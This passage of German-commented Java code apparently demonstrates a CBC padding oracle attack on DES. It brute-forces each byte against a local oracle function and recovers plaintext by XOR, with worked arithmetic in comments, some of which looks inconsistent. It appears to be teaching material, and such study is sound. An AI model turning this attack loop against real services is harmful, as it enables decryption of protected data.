^ (byte) (P206) ^ (byte) (C1[6 - 1])); Cb1[5 - 1] = (byte) ((byte) (7) ^ (byte) (P205) ^ (byte) (C1[5 - 1])); Cb1[4 - 1] = (byte) ((byte) (7) ^ (byte) (P204) ^ (byte) (C1[4 - 1])); Cb1[3 - 1] = (byte) ((byte) (7) ^ (byte) (P203) ^ (byte) (C1[3 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + Cb1[5 - 1] + " Hex:x" + String.format("%02X", Cb1[5 - 1])); System.out.println( "Der gesuchte Wert von Cb1[4-1] ist:" + Cb1[4 - 1] + " Hex:x" + String.format("%02X", Cb1[4 - 1])); System.out.println( "Der gesuchte Wert von Cb1[3-1] ist:" + Cb1[3 - 1] + " Hex:x" + String.format("%02X", Cb1[3 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(2 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 02 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[2-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } byte P202 = (byte) ((byte) (7) ^ C1[2 - 1] ^ Cb1[2 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[2] ist:" + P202 + " Hex:x" + String.format("%02X", P202)); } // mathematik P2t[2 - 1] = P202; System.out.println("Treffer für Cb1[2]:x" + String.format("%02X", iGesichert) + " Berechnung P2[2]:x" + String.format("%02X", P202) + " = P'2[2]=:x07" + " ^ C1[2]=:x" + String.format("%02X", (C1[2 - 1])) + " ^ C'[2]=:x" + String.format("%02X", (Cb1[2 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 01 mit Padding x08 ="); // nun tuen wir so als gäbe es ein achterer-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x08 ⊕ 0x05 ⊕ 0xca C′[8] = 0xc7 * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x08 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x2f * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x08 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xdc * * C′[5] = P′2[5] ⊕ P2[5] ⊕ C1[5] C′[5] = 0x08 ⊕ 0x05 ⊕ 0xe6 C′[5] = 0xeb * * C′[4] = P′2[4] ⊕ P2[4] ⊕ C1[4] C′[4] = 0x08 ⊕ 0x05 ⊕ 0x51 C′[4] = 0x5c * * C′[3] = P′2[3] ⊕ P2[3] ⊕ C1[3] C′[3] = 0x08 ⊕ 0x64 ⊕ 0x0d C′[3] = 0x61 * * C′[2] = P′2[2] ⊕ P2[2] ⊕ C1[2] C′[2] = 0x08 ⊕ 0x6c ⊕ 0xe1 C′[2] = 0x85 */ Cb1[8 - 1] = (byte) ((byte) (8) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (8) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (8) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); Cb1[5 - 1] = (byte) ((byte) (8) ^ (byte) (P205) ^ (byte) (C1[5 - 1])); Cb1[4 - 1] = (byte) ((byte) (8) ^ (byte) (P204) ^ (byte) (C1[4 - 1])); Cb1[3 - 1] = (byte) ((byte) (8) ^ (byte) (P203) ^ (byte) (C1[3 - 1])); Cb1[2 - 1] = (byte) ((byte) (8) ^ (byte) (P202) ^ (byte) (C1[2 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + Cb1[5 - 1] + " Hex:x" + String.format("%02X", Cb1[5 - 1])); System.out.println( "Der gesuchte Wert von Cb1[4-1] ist:" + Cb1[4 - 1] + " Hex:x" + String.format("%02X", Cb1[4 - 1])); System.out.println( "Der gesuchte Wert von Cb1[3-1] ist:" + Cb1[3 - 1] + " Hex:x" + String.format("%02X", Cb1[3 - 1])); System.out.println( "Der gesuchte Wert von Cb1[2-1] ist:" + Cb1[2 - 1] + " Hex:x" + String.format("%02X", Cb1[2 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(1 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 01 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[1-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } byte P201 = (byte) ((byte) (8) ^ C1[1 - 1] ^ Cb1[1 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[1] ist:" + P201 + " Hex:x" + String.format("%02X", P201)); } // mathematik P2t[1 - 1] = P201; System.out.println("Treffer für Cb1[1]:x" + String.format("%02X", iGesichert) + " Berechnung P2[1]:x" + String.format("%02X", P201) + " = P'2[1]=:x08" + " ^ C1[1]=:x" + String.format("%02X", (C1[1 - 1])) + " ^ C'[1]=:x" + String.format("%02X", (Cb1[1 - 1])) + " P2:" + printByteArray(P2t, 17)); // ergebnis byte[] decrypted2Byte = { P201, P202, P203, P204, P205, P206, P207, P208 }; String decrypted2String = aBtS(decrypted2Byte); System.out.println("Umwandlung von P2t:" + printByteArray(P2t, 17) + "in einen String:" + decrypted2String); System.out.println(); System.out.println( "= = = Durchprobieren der Modifikation am desOracle mit unterschiedlichen Werten abgeschlossen = = ="); // ======================== Block 1 Ende ================================= System.out.println(); System.out.println("= = = Test des desOracles mit Block C1 = = ="); // diese modifikation erzeugt den wert des ersten blockes System.arraycopy(C1, 0, C2, 0, C1.length); System.arraycopy(IV, 0, C1, 0, IV.length); // verknüpfung der neuen variable mit Block 2 = C2 Cb1 = new byte[] { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00 }; Cb2 = new byte[16]; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); System.out.println("Var Cb2 [Länge:" + Cb2.length + " Byte]:" + printHexBinary(Cb2)); // test des oracles desOracle = desCbcPaddingOracle(IV, Cb2); System.out.println("desOracle mit Eingabe :" + printHexBinary(Cb2) + ":" + desOracle); System.out.println("= = = Test der Modifikation am desOracle abgeschlossen = = ="); // Block 2 System.out.println(); System.out.println( "= = = Durchprobieren der Modifikation am desPaddingOracle mit unterschiedlichen Werten = = ="); // wir verändern nun das letzte byte von cb1, verknüpfen die beiden byte arrays System.out.println("Cb1 Schleife :" + printByteArray(Cb1, 17)); System.out.println("C2 Original :" + printByteArray(C2, 17)); System.out.println("Cb2 Cb1 + C2 :" + printByteArray(Cb2, 17)); // Cb1 und C2 und testen am desPaddingOracle System.out.println("= Byte 08 mit Padding x01 ="); iGesichert = 0; // nimmt das gesuchte i auf, da i nach dem Ende der Schleife nicht mehr // verfügbar ist // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(8 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 08 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println("Der gesuchte Wert von Cb1[8] ist:" + iGesichert + "(byte) Hex:x" + String.format("%02X", iGesichert)); } /* * // ein bischen xor mathematik: P′2[8] = P2[8] ⊕ C1[8] ⊕ C′[8] (re-arrange * using XOR's commutative property): P2[8] = P′2[8] ⊕ C1[8] ⊕ C′[8] P2[8] = * 0x01 ⊕ 0xca ⊕ 0xce P2[8] = 5 */ // folgende formel ergibt sich // die zahl hinter (byte) = 1 ist das padding bei einer paddinglänge von 1 // C1[7] ist das 8. byte unseres original C1 byte arrays // Cb1[7] ist das 8. byte des ersten (modifizierten) blocks des Cb1 arrays P208 = (byte) ((byte) (1) ^ C1[8 - 1] ^ Cb1[8 - 1]); if (out2Bool == true) { System.out .println("Der gesuchte Wert von P2[8] ist:" + P208 + "(byte) Hex:x" + String.format("%02X", P208)); } // mathematik P2t = new byte[8]; P2t[8 - 1] = P208; System.out.println("Treffer für Cb1[8]:x" + String.format("%02X", iGesichert) + " Berechnung P2[8]:x" + String.format("%02X", P208) + " = P'2[8]=:x01" + " ^ C1[8]=:x" + String.format("%02X", (C1[8 - 1])) + " ^ C'[8]=:x" + String.format("%02X", (Cb1[8 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 07 mit Padding x02 ="); // nun tuen wir so als gäbe es ein zweier-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x02 ⊕ 0x05 ⊕ 0xca C′[8] = 0xcd */ Cb1[8 - 1] = (byte) ((byte) (2) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(7 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 07 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } P207 = (byte) ((byte) (2) ^ C1[7 - 1] ^ Cb1[7 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[7] ist:" + P207 + " Hex:x" + String.format("%02X", P207)); } // mathematik P2t[7 - 1] = P207; System.out.println("Treffer für Cb1[7]:x" + String.format("%02X", iGesichert) + " Berechnung P2[7]:x" + String.format("%02X", P207) + " = P'2[7]=:x02" + " ^ C1[7]=:x" + String.format("%02X", (C1[7 - 1])) + " ^ C'[7]=:x" + String.format("%02X", (Cb1[7 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 06 mit Padding x03 ="); // nun tuen wir so als gäbe es ein dreier-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x03 ⊕ 0x05 ⊕ 0xca C′[8] = 0xcc * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x03 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x24 */ Cb1[8 - 1] = (byte) ((byte) (3) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (3) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(6 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 06 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } P206 = (byte) ((byte) (3) ^ C1[6 - 1] ^ Cb1[6 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[6] ist:" + P206 + " Hex:x" + String.format("%02X", P206)); } // mathematik P2t[6 - 1] = P206; System.out.println("Treffer für Cb1[6]:x" + String.format("%02X", iGesichert) + " Berechnung P2[6]:x" + String.format("%02X", P206) + " = P'2[6]=:x03" + " ^ C1[6]=:x" + String.format("%02X", (C1[6 - 1])) + " ^ C'[6]=:x" + String.format("%02X", (Cb1[6 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 05 mit Padding x04 ="); // nun tuen wir so als gäbe es ein vierer-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x04 ⊕ 0x05 ⊕ 0xca C′[8] = 0xcb * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x04 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x23 * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x04 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xd0 */ Cb1[8 - 1] = (byte) ((byte) (4) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (4) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (4) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(5 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); if (out1Bool == true) { System.out.println("Cb2 Byte 05 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } desOracle = desCbcPaddingOracle(IV, Cb2); if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } P205 = (byte) ((byte) (4) ^ C1[5 - 1] ^ Cb1[5 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[5] ist:" + P205 + " Hex:x" + String.format("%02X", P205)); } // mathematik P2t[5 - 1] = P205; System.out.println("Treffer für Cb1[5]:x" + String.format("%02X", iGesichert) + " Berechnung P2[5]:x" + String.format("%02X", P205) + " = P'2[5]=:x04" + " ^ C1[5]=:x" + String.format("%02X", (C1[5 - 1])) + " ^ C'[5]=:x" + String.format("%02X", (Cb1[5 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 04 mit Padding x05 ="); // nun tuen wir so als gäbe es ein fünfer-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x05 ⊕ 0x05 ⊕ 0xca C′[8] = 0xca * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x05 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x22 * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x05 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xd1 * * C′[5] = P′2[5] ⊕ P2[5] ⊕ C1[5] C′[5] = 0x05 ⊕ 0x05 ⊕ 0xe6 C′[5] = 0xe6 */ Cb1[8 - 1] = (byte) ((byte) (5) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (5) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (5) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); Cb1[5 - 1] = (byte) ((byte) (5) ^ (byte) (P205) ^ (byte) (C1[5 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + Cb1[5 - 1] + " Hex:x" + String.format("%02X", Cb1[5 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(4 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 04 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[4-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } P204 = (byte) ((byte) (5) ^ C1[4 - 1] ^ Cb1[4 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[4] ist:" + P204 + " Hex:x" + String.format("%02X", P204)); } // mathematik P2t[4 - 1] = P204; System.out.println("Treffer für Cb1[4]:x" + String.format("%02X", iGesichert) + " Berechnung P2[4]:x" + String.format("%02X", P204) + " = P'2[4]=:x05" + " ^ C1[4]=:x" + String.format("%02X", (C1[4 - 1])) + " ^ C'[4]=:x" + String.format("%02X", (Cb1[4 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 03 mit Padding x06 ="); // nun tuen wir so als gäbe es ein sechser-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x06 ⊕ 0x05 ⊕ 0xca C′[8] = 0xc9 * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x06 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x21 * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x06 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xd2 * * C′[5] = P′2[5] ⊕ P2[5] ⊕ C1[5] C′[5] = 0x06 ⊕ 0x05 ⊕ 0xe6 C′[5] = 0xe5 * * C′[4] = P′2[4] ⊕ P2[4] ⊕ C1[4] C′[4] = 0x06 ⊕ 0x05 ⊕ 0x51 C′[4] = 0x52 */ Cb1[8 - 1] = (byte) ((byte) (6) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (6) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (6) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); Cb1[5 - 1] = (byte) ((byte) (6) ^ (byte) (P205) ^ (byte) (C1[5 - 1])); Cb1[4 - 1] = (byte) ((byte) (6) ^ (byte) (P204) ^ (byte) (C1[4 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + Cb1[5 - 1] + " Hex:x" + String.format("%02X", Cb1[5 - 1])); System.out.println( "Der gesuchte Wert von Cb1[4-1] ist:" + Cb1[4 - 1] + " Hex:x" + String.format("%02X", Cb1[4 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(3 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 03 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[3-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } P203 = (byte) ((byte) (6) ^ C1[3 - 1] ^ Cb1[3 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[3] ist:" + P203 + " Hex:x" + String.format("%02X", P203)); } // mathematik P2t[3 - 1] = P203; System.out.println("Treffer für Cb1[3]:x" + String.format("%02X", iGesichert) + " Berechnung P2[3]:x" + String.format("%02X", P203) + " = P'2[3]=:x06" + " ^ C1[3]=:x" + String.format("%02X", (C1[3 - 1])) + " ^ C'[3]=:x" + String.format("%02X", (Cb1[3 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 02 mit Padding x07 ="); // nun tuen wir so als gäbe es ein siebener-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x07 ⊕ 0x05 ⊕ 0xca C′[8] = 0xc9 * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x07 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x21 * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x07 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xd2 * * C′[5] = P′2[5] ⊕ P2[5] ⊕ C1[5] C′[5] = 0x07 ⊕ 0x05 ⊕ 0xe6 C′[5] = 0xe5 * * C′[4] = P′2[4] ⊕ P2[4] ⊕ C1[4] C′[4] = 0x07 ⊕ 0x05 ⊕ 0x51 C′[4] = 0x52 * * C′[3] = P′2[3] ⊕ P2[3] ⊕ C1[3] C′[3] = 0x07 ⊕ 0x64 ⊕ 0x0d C′[3] = 0x52 */ Cb1[8 - 1] = (byte) ((byte) (7) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (7) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (7) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); Cb1[5 - 1] = (byte) ((byte) (7) ^ (byte) (P205) ^ (byte) (C1[5 - 1])); Cb1[4 - 1] = (byte) ((byte) (7) ^ (byte) (P204) ^ (byte) (C1[4 - 1])); Cb1[3 - 1] = (byte) ((byte) (7) ^ (byte) (P203) ^ (byte) (C1[3 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + Cb1[5 - 1] + " Hex:x" + String.format("%02X", Cb1[5 - 1])); System.out.println( "Der gesuchte Wert von Cb1[4-1] ist:" + Cb1[4 - 1] + " Hex:x" + String.format("%02X", Cb1[4 - 1])); System.out.println( "Der gesuchte Wert von Cb1[3-1] ist:" + Cb1[3 - 1] + " Hex:x" + String.format("%02X", Cb1[3 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(2 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 02 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[2-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } P202 = (byte) ((byte) (7) ^ C1[2 - 1] ^ Cb1[2 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[2] ist:" + P202 + " Hex:x" + String.format("%02X", P202)); } // mathematik P2t[2 - 1] = P202; System.out.println("Treffer für Cb1[2]:x" + String.format("%02X", iGesichert) + " Berechnung P2[2]:x" + String.format("%02X", P202) + " = P'2[2]=:x07" + " ^ C1[2]=:x" + String.format("%02X", (C1[2 - 1])) + " ^ C'[2]=:x" + String.format("%02X", (Cb1[2 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 01 mit Padding x08 ="); // nun tuen wir so als gäbe es ein achter-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x08 ⊕ 0x05 ⊕ 0xca C′[8] = 0xc7 * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x08 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x2f * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x08 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xdc * * C′[5] = P′2[5] ⊕ P2[5] ⊕ C1[5] C′[5] = 0x08 ⊕ 0x05 ⊕ 0xe6 C′[5] = 0xeb * * C′[4] = P′2[4] ⊕ P2[4] ⊕ C1[4] C′[4] = 0x08 ⊕ 0x05 ⊕ 0x51 C′[4] = 0x5c * * C′[3] = P′2[3] ⊕ P2[3] ⊕ C1[3] C′[3] = 0x08 ⊕ 0x64 ⊕ 0x0d C′[3] = 0x61 * * C′[2] = P′2[2] ⊕ P2[2] ⊕ C1[2] C′[2] = 0x08 ⊕ 0x6c ⊕ 0xe1 C′[2] = 0x85 */ Cb1[8 - 1] = (byte) ((byte) (8) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (8) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (8) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); Cb1[5 - 1] = (byte) ((byte) (8) ^ (byte) (P205) ^ (byte) (C1[5 - 1])); Cb1[4 - 1] = (byte) ((byte) (8) ^ (byte) (P204) ^ (byte) (C1[4 - 1])); Cb1[3 - 1] = (byte) ((byte) (8) ^ (byte) (P203) ^ (byte) (C1[3 - 1])); Cb1[2 - 1] = (byte) ((byte) (8) ^ (byte) (P202) ^ (byte) (C1[2 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + Cb1[5 - 1] + " Hex:x" + String.format("%02X", Cb1[5 - 1])); System.out.println( "Der gesuchte Wert von Cb1[4-1] ist:" + Cb1[4 - 1] + " Hex:x" + String.format("%02X", Cb1[4 - 1])); System.out.println( "Der gesuchte Wert von Cb1[3-1] ist:" + Cb1[3 - 1] + " Hex:x" + String.format("%02X", Cb1[3 - 1])); System.out.println( "Der gesuchte Wert von Cb1[2-1] ist:" + Cb1[2 - 1] + " Hex:x" + String.format("%02X", Cb1[2 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(1 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 